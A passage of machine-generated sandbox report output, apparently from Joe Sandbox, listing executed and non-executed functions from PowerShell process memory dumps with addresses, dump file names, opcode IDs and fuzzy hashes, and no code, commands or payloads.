                    • Instruction Fuzzy Hash: E931ED3081E68E8EFBB8AF55CC1ABF93294FF45359F400139D50D8B192DB386989CB15
                    Function 00007FF848E45B99 Relevance: .1, Instructions: 70COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3446880050.00007FF848E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9eab1e84fd7683bc574dd7ec387e1f144542f39daaf3cf970e39cc64528d15f1
                    • Instruction ID: 061776a471483e2cc467d2ac953beed0cc1d55d83f2409f922bf7b1312725eeb
                    • Opcode Fuzzy Hash: 9eab1e84fd7683bc574dd7ec387e1f144542f39daaf3cf970e39cc64528d15f1
                    • Instruction Fuzzy Hash: F2113A22D2EE995FF3A5BA2C28155B8B6D0FF44BA0F5802F6D40CD31D3DE186C044399
                    Function 00007FF848D741E5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3445621924.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ede5d77e9750c9eb621686212f7b63d82689d0c2c00efcc77ebbbc386f3669d0
                    • Instruction ID: 612416a714135cbc2c1e35c60aec2ebdd4a3adcc4d665dbc861ceac1b8e34887
                    • Opcode Fuzzy Hash: ede5d77e9750c9eb621686212f7b63d82689d0c2c00efcc77ebbbc386f3669d0
                    • Instruction Fuzzy Hash: 8701447115CB084FD748EF0CE451AB5B7E0FB95364F10056DE58AC3655D726E882CB45

                    Non-executed Functions

                    Function 00007FF848E43244 Relevance: .6, Instructions: 570COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3446880050.00007FF848E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec31089925446cdda531b8d5ade4d0687e0801cd8c3c5ce138d1ec0c4f709f1c
                    • Instruction ID: 44149ae11a5fb8f05a10e2d6998626b4032c15c130756c6d78b6c63552dfd75e
                    • Opcode Fuzzy Hash: ec31089925446cdda531b8d5ade4d0687e0801cd8c3c5ce138d1ec0c4f709f1c
                    • Instruction Fuzzy Hash: F6F12331E0DAC94FE796AB3C98559B5BFE0EF56650F0801FBD08DCB193DA28A806C355

                    Executed Functions

                    Function 04D0EF70 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2196d04383fee7255cefd5a6c3d207daa4279ae33b5de9844b74327ed7695b88
                    • Instruction ID: 28d5c42fc86f9e80e0ee8b21891c3fd074f7c97dd4c709baacbf447944e5b600
                    • Opcode Fuzzy Hash: 2196d04383fee7255cefd5a6c3d207daa4279ae33b5de9844b74327ed7695b88
                    • Instruction Fuzzy Hash: E9B12C70E002099FDB24CFA9D98579DBBF2BF88314F24C52DD415E7294EBB4A846CB91
                    Function 04D0F840 Relevance: .3, Instructions: 266COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6d5ee9f05ec8fbfce2c8a6d13ea64c7e55715d6b415be1f70af134ed8bd63d0
                    • Instruction ID: e47054316bc6370c2da8e3919ffb054093e9921a738fc1822036150b8350581a
                    • Opcode Fuzzy Hash: f6d5ee9f05ec8fbfce2c8a6d13ea64c7e55715d6b415be1f70af134ed8bd63d0
                    • Instruction Fuzzy Hash: 71B15E71E00209DFDB20CFA9D99179DBBF2BF88314F24C52DD418A7294EBB4A845CB81
                    Function 07CB6D38 Relevance: 7.9, Strings: 6, Instructions: 448COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                    • API String ID: 0-471056614
                    • Opcode ID: b5fb4545f4fb3ea0e4a4a363e0013326d2f66b33be35b1131dea6136341bf42a
                    • Instruction ID: 827549d6e75a3a99a94ce91af9da3600fd52619bff91d1628d6b62d62f57868c
                    • Opcode Fuzzy Hash: b5fb4545f4fb3ea0e4a4a363e0013326d2f66b33be35b1131dea6136341bf42a
                    • Instruction Fuzzy Hash: 14124FB0A00215CFDB24DB68C994B9ABBB2FB85304F10859AE9097B355CB35ED85CF91
                    Function 07CB67F7 Relevance: 7.8, Strings: 6, Instructions: 290COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                    • API String ID: 0-471056614
                    • Opcode ID: 1d3a737838c3ba2425418c598f12a151dc30f37dacb0d17848caf805e6b6aac6
                    • Instruction ID: c41f20be66036aa294cc80b810d2a15c6297bd327834d53e9713e86d0697525c
                    • Opcode Fuzzy Hash: 1d3a737838c3ba2425418c598f12a151dc30f37dacb0d17848caf805e6b6aac6
                    • Instruction Fuzzy Hash: A7B1A3B0A002059FCB28DBA8C555BAEBBB2EF84704F11C459E9017F395CB76EC45CB91
                    Function 07CB3128 Relevance: 6.5, Strings: 5, Instructions: 213COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: 63f3a83f5f8b3474173e324e6839a32641cbef71a877435035ebf4661bcebf59
                    • Instruction ID: 7f23eb26cca155a277f76c1b1d80efe6d486c82c11140e9ce9f0ab0c4f422f33
                    • Opcode Fuzzy Hash: 63f3a83f5f8b3474173e324e6839a32641cbef71a877435035ebf4661bcebf59
                    • Instruction Fuzzy Hash: CA610CB1704385AFD7358F6988906E6BFA5EF82710F19C4ABF844CB252CB35CA45C762
                    Function 07CB8048 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q
                    • API String ID: 0-1785108022
                    • Opcode ID: ca9a577cc2d803769a201e1ab5ce2668f0d5e7f87eac2e8705a148132b16fcb7
                    • Instruction ID: 74b61ce89307fe4a30e913ee7937e1d226770b831ada14f99e797b663ec7520e
                    • Opcode Fuzzy Hash: ca9a577cc2d803769a201e1ab5ce2668f0d5e7f87eac2e8705a148132b16fcb7
                    • Instruction Fuzzy Hash: 95914BB0B04206CFCB34DB69D9946EABBEAEFC5200F14846AE505CB255DB35CA45CBE1
                    Function 07CB6747 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q
                    • API String ID: 0-705557208
                    • Opcode ID: 3efe6c0ad815bab759347c93dd05fce1ed3ee63c98cb5d5fb56052904edd60e7
                    • Instruction ID: b52ded4f199e65cbb1f2a35c78ceadfe74e97c6a162191e35a2776f48f2f50d8
                    • Opcode Fuzzy Hash: 3efe6c0ad815bab759347c93dd05fce1ed3ee63c98cb5d5fb56052904edd60e7
                    • Instruction Fuzzy Hash: 00A18CB0A002059FCB24CF58C581BAEBBB2EF88708F15C559E9057F3A5CB36E945CB91
                    Function 07CB73B3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: 768763ad1c359f9940f3ccf18ce90fced69ce0a0da7953a1e812d44e38629874
                    • Instruction ID: d99dd88dc8e7d78979a5dc7776e2f7a1d59bf9265843ca954e7c6100b742c914
                    • Opcode Fuzzy Hash: 768763ad1c359f9940f3ccf18ce90fced69ce0a0da7953a1e812d44e38629874
                    • Instruction Fuzzy Hash: 66F1B2B0B402149FDB24DB68C995BAEBBB2EF84304F1084A5E9097F795CB35AD81CF51
                    Function 07CB86C8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: 521d32c1270d5b3faddefcfcb67c1639d7f2e6d17701656447884dad931a9c20
                    • Instruction ID: 5e83326b48db904b898477851fd8ebb4d58978906778d1ec10c081022b04a830
                    • Opcode Fuzzy Hash: 521d32c1270d5b3faddefcfcb67c1639d7f2e6d17701656447884dad931a9c20
                    • Instruction Fuzzy Hash: F4512DB0B042168FCB389B79C5946EB77EA9F85204F148479F501EB255DB32DE41CBE1
                    Function 07CB86AE Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q
                    • API String ID: 0-1259897404
                    • Opcode ID: 291653387aa4138e525afaefbe6ab008db9648058f1fd360ed46a4a64a75ccaf
                    • Instruction ID: 613224d0c9ac538308cb15b1c6410891d485100be8eaf8bbcf9472eba4d2d413
                    • Opcode Fuzzy Hash: 291653387aa4138e525afaefbe6ab008db9648058f1fd360ed46a4a64a75ccaf
                    • Instruction Fuzzy Hash: CB41EDF4B042129FCB348F65D5C0BEB77EA9B85218F1884A9F501EB255D736DA40C7E1
                    Function 07CB353C Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP]q
                    • API String ID: 0-2175968468
                    • Opcode ID: 426f9bf41c82c8a388b7732be5e303be9f8f763d5879e14f97acc4fc031148ca
                    • Instruction ID: 7fdd6f4c89ae3690004c05504b536b465b80d3d382f67253baa585d4c1cde5b9
                    • Opcode Fuzzy Hash: 426f9bf41c82c8a388b7732be5e303be9f8f763d5879e14f97acc4fc031148ca
                    • Instruction Fuzzy Hash: C2413AB06093C59FC7218B64C894699BFB1EF46610F1A849BE584DF253C731DD49C7A1
                    Function 07CB5058 Relevance: .7, Instructions: 741COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d0ed09718e043e1daf74da748a97e302d76ea4166a060ba03370f550c2760af1
                    • Instruction ID: 8c9353ccd4ffa06015bae6f6e9c467b9b084faee1e28656a0dd8e9930fcf0ed9
                    • Opcode Fuzzy Hash: d0ed09718e043e1daf74da748a97e302d76ea4166a060ba03370f550c2760af1
                    • Instruction Fuzzy Hash: 48626BB4B00204CFDB24CB98D595AA9BBB2EF85304F24C069E905AF355CB76ED46CB91
                    Function 07CB5047 Relevance: .6, Instructions: 550COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5ef26e59a6af15f373a137c13b0a9f93b15d043494dcc4651db20c741fb1e68
                    • Instruction ID: 1efdd122ecdff7e7b1e95a688bbacd04612a8cb8d35ddf3410ff84f18826fc58
                    • Opcode Fuzzy Hash: d5ef26e59a6af15f373a137c13b0a9f93b15d043494dcc4651db20c741fb1e68
                    • Instruction Fuzzy Hash: 87326AB4B00204CFDB24CB98D581AA9BBB2EF89704F24C059E915AF355C772ED46CF91
                    Function 07CB57CD Relevance: .5, Instructions: 483COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9be408a65de3f8522b42593119a490398cd69a4905b8e3a6e1ff5d5aef9383f5
                    • Instruction ID: c594f54fd62e55a2b071117626208aca02f4fa34b88ac3c469b189ae06184890
                    • Opcode Fuzzy Hash: 9be408a65de3f8522b42593119a490398cd69a4905b8e3a6e1ff5d5aef9383f5
                    • Instruction Fuzzy Hash: F51258B4B00201CFDB24CB98C581AA9BBB2EF89704F24C069F915AF355C776ED46CB91
                    Function 04D02FF0 Relevance: .5, Instructions: 453COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b26f84ab0931abafb53881aa7245adcf0de8c75b9c3b2bf5948d825a979237ed
                    • Instruction ID: 2c2f5b607d5c9632cec707213d3af0279707e66479167bab935a46d67c199ad8
                    • Opcode Fuzzy Hash: b26f84ab0931abafb53881aa7245adcf0de8c75b9c3b2bf5948d825a979237ed
                    • Instruction Fuzzy Hash: AA122774A002499FCB05CFA8C584AAEFBF2BF89310F25C559E845AB3A5C731ED41CB90
                    Function 04D04A88 Relevance: .4, Instructions: 360COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6818b82392584e5a0dc750cf15a132ab57584bd05e50c480a0dd327a2ae2aa7
                    • Instruction ID: ae0ac63b6c89c0a125efdbc0b2e259dcc6d1659e6aa238c8a9dbd1f8da7a765b
                    • Opcode Fuzzy Hash: e6818b82392584e5a0dc750cf15a132ab57584bd05e50c480a0dd327a2ae2aa7
                    • Instruction Fuzzy Hash: A0E13934A00218AFDB05DFA8D584E9DBBB2FF88310F148159E945AB3A5C775ED81CB90
                    Function 04D09300 Relevance: .3, Instructions: 319COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7491982cee50ecc4fdc21eb8f0dc6dc4564e8c4d907b4ce025b7f02dbd4976d1
                    • Instruction ID: 09b2fa993dd18a9108a188900c5a382655804c2db736292b0f8cbf7ddaeabdf0
                    • Opcode Fuzzy Hash: 7491982cee50ecc4fdc21eb8f0dc6dc4564e8c4d907b4ce025b7f02dbd4976d1
                    • Instruction Fuzzy Hash: 9EC1BF75A00248DFCB14DFA4C564A9DBBF2FF84314F1585A9E406AB3A6CB34EC49CB80
                    Function 07CB5B80 Relevance: .3, Instructions: 275COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5515917c7e332752a536616049857f251a037110131041ed6f21ec0eddebb18c
                    • Instruction ID: a3ec5f91e6178df94bc68a3a01d68b8b0c4d0c0b6e2eea5897e2049460d73ee0
                    • Opcode Fuzzy Hash: 5515917c7e332752a536616049857f251a037110131041ed6f21ec0eddebb18c
                    • Instruction Fuzzy Hash: BAB182B0A002059FD724DBA9D595BAEBBA3AF88304F548468F5016F395CB76EC41CF91
                    Function 04D0EF6F Relevance: .3, Instructions: 273COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 82a08db36a459512fa640ba44348017aa8851e6e71ebfa87133d4f7cab1bdf50
                    • Instruction ID: c5a3ac6ca0f6ce6cbc54dab213a0842449a6dac8686eb34e9e79d5197b49f346
                    • Opcode Fuzzy Hash: 82a08db36a459512fa640ba44348017aa8851e6e71ebfa87133d4f7cab1bdf50
                    • Instruction Fuzzy Hash: D9B11C70E002099FDB20CFA9D98579DBBF1BF88314F24C52DD455E7294EBB4A845CB91
                    Function 04D0F836 Relevance: .3, Instructions: 264COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3db03ffa686d331e649f5b42576ddadeb0c75ec8fe48bb02e0a7dcbafb62e023
                    • Instruction ID: 29c23fbb31fd5c693ec7c8930bc1994e838ab0dc88e48a83b6f5bd26cb7f82b1
                    • Opcode Fuzzy Hash: 3db03ffa686d331e649f5b42576ddadeb0c75ec8fe48bb02e0a7dcbafb62e023
                    • Instruction Fuzzy Hash: A5A13C71E00209DFDB20CFA9D99579DBBF1BF48718F24C52DD418A7294EBB4A845CB81
                    Function 07CB5B6F Relevance: .2, Instructions: 246COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bbf210ff8a58957b032575c73517e6ff27ac8ac1e4c850168639e257ebfe3fc
                    • Instruction ID: 7877dd7ef0bac3401517ad96651110a6726e7cf23399826616f35219cd8a4da3
                    • Opcode Fuzzy Hash: 4bbf210ff8a58957b032575c73517e6ff27ac8ac1e4c850168639e257ebfe3fc
                    • Instruction Fuzzy Hash: A4A181B0A10201DFD724CBA4D685BAEBBB2AF88314F148469F5016F395CB76ED41CF91
                    Function 04D08B68 Relevance: .2, Instructions: 203COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc949159606723110066100164ece5d10b4775cd42e20cb351e2a9aaea718192
                    • Instruction ID: adaf5778e617cf6da1f3247368c3f1626d2d5b08ed9cf75c4b6e9ff125827038
                    • Opcode Fuzzy Hash: dc949159606723110066100164ece5d10b4775cd42e20cb351e2a9aaea718192
                    • Instruction Fuzzy Hash: EE819D30A052449FCB15EF64D484AAEBBF2FF89304F1885A9E445AB362D738EC45DB50
                    Function 04D09AC8 Relevance: .2, Instructions: 191COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 89517cd36290a53df3a2a18379c21b3cd0851da3ae9ddde3e766a1ad680deed6
                    • Instruction ID: 8e0fb9ce7dee9855f891a34c71001f9079946b175a5ef84186abd3150ad0298e
                    • Opcode Fuzzy Hash: 89517cd36290a53df3a2a18379c21b3cd0851da3ae9ddde3e766a1ad680deed6
                    • Instruction Fuzzy Hash: 7371BC70A00209DFCB14DF69C890B9EBBF6FF84314F14C56AE4199B6A1DB75AC46CB90
                    Function 04D09C36 Relevance: .2, Instructions: 188COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9d3319523c38893599449d5ebe7eb72f62bd239dd8afc1fe0704ab7c447bb3c8
                    • Instruction ID: 272e49d0682d16b943b3e27d668f95f05f9a2488afb61c43e7e6c79b45461005
                    • Opcode Fuzzy Hash: 9d3319523c38893599449d5ebe7eb72f62bd239dd8afc1fe0704ab7c447bb3c8
                    • Instruction Fuzzy Hash: F8713970E00208EFDF18DFA5D594BADBBF6BF88304F148469D412AB2A1DB75AC46CB50
                    Function 04D0F5AC Relevance: .2, Instructions: 184COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8dc78c3c21565d5d25126cdd80bc7bf838c335474f650016a21c5ef5e91fb6f
                    • Instruction ID: 26b9efe4a5075f8f54f5084379f0827203af89c365c60732daa0d48007d6df04
                    • Opcode Fuzzy Hash: d8dc78c3c21565d5d25126cdd80bc7bf838c335474f650016a21c5ef5e91fb6f
                    • Instruction Fuzzy Hash: 70713C70E002499FDB20CFA9C9457DDBBF1BF88714F24852DD415AB294EBB4A846CB92
                    Function 04D0F5B8 Relevance: .2, Instructions: 180COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35fdb21c8138e70189b6a06e499227a303bcb026321a2284801ac53915b4e56f
                    • Instruction ID: 3068d8065f7ad48c09d12a280e04423c10daac475bc9de9623fed0c10f74c682
                    • Opcode Fuzzy Hash: 35fdb21c8138e70189b6a06e499227a303bcb026321a2284801ac53915b4e56f
                    • Instruction Fuzzy Hash: FF714C70E002099FDF24CFA9C94479EBBF2BF88714F24C52DD415A7294EBB4A846CB91
                    Function 04D09AB3 Relevance: .1, Instructions: 146COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 254373f70de7c50d914622f53e73b132331d4cfec583a0ab226676add909deac
                    • Instruction ID: eac4ea68093e228dcc97cb50f26cad756d0815c758e70d2d906a1fa7ffeaef11
                    • Opcode Fuzzy Hash: 254373f70de7c50d914622f53e73b132331d4cfec583a0ab226676add909deac
                    • Instruction Fuzzy Hash: 62516EB0E00209DFDB18DFA5C8547AEBBF6FF84314F148469D406AB6A1DBB5AC45CB50
                    Function 07CB0C7A Relevance: .1, Instructions: 145COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3511d36630d7dc2aa11c4c20447874c3bc46db113e03ee2004653f01a072b923
                    • Instruction ID: 13b3aa4bf5b2f5a2330697c392ecafcc9c2120d3c44521c22c614f128c6c09b9
                    • Opcode Fuzzy Hash: 3511d36630d7dc2aa11c4c20447874c3bc46db113e03ee2004653f01a072b923
                    • Instruction Fuzzy Hash: 5F4139B170024A8FDB308F7984806EBBBA5EF85310F54846AE845DB292CB35DAC5C7A1
                    Function 04D0390F Relevance: .1, Instructions: 143COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7995406b12c20abcea8489cf5e068f5d0052408d124aa1103adb38eb100e880f
                    • Instruction ID: 2d2842b3f5b579fb835f6c0792d4cf3d3011f40e52dd2e5351b7ceb87251c37c
                    • Opcode Fuzzy Hash: 7995406b12c20abcea8489cf5e068f5d0052408d124aa1103adb38eb100e880f
                    • Instruction Fuzzy Hash: BC514B3190A3959FCB02CB6CD9A09DABFB0EF4B31071541D7D484DB2A2C728ED58CBA5
                    Function 07CB9F8D Relevance: .1, Instructions: 140COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f9efb8da9939e2d2d5d9c29bd8563cc0ed86ecd91391ffeaab6eca216c498d8
                    • Instruction ID: 26bfad10d8bc194c092d3204f9ca20cbbf90057082993c8a2c07de11419ce6be
                    • Opcode Fuzzy Hash: 3f9efb8da9939e2d2d5d9c29bd8563cc0ed86ecd91391ffeaab6eca216c498d8
                    • Instruction Fuzzy Hash: A741BFF17041159BCB359778A4916EEBF928FD2324F14C8AAF5429B292DE33D901C7A2
                    Function 04D02B48 Relevance: .1, Instructions: 137COMMON
                    Download Yara Rule
                    Memory Dump Source
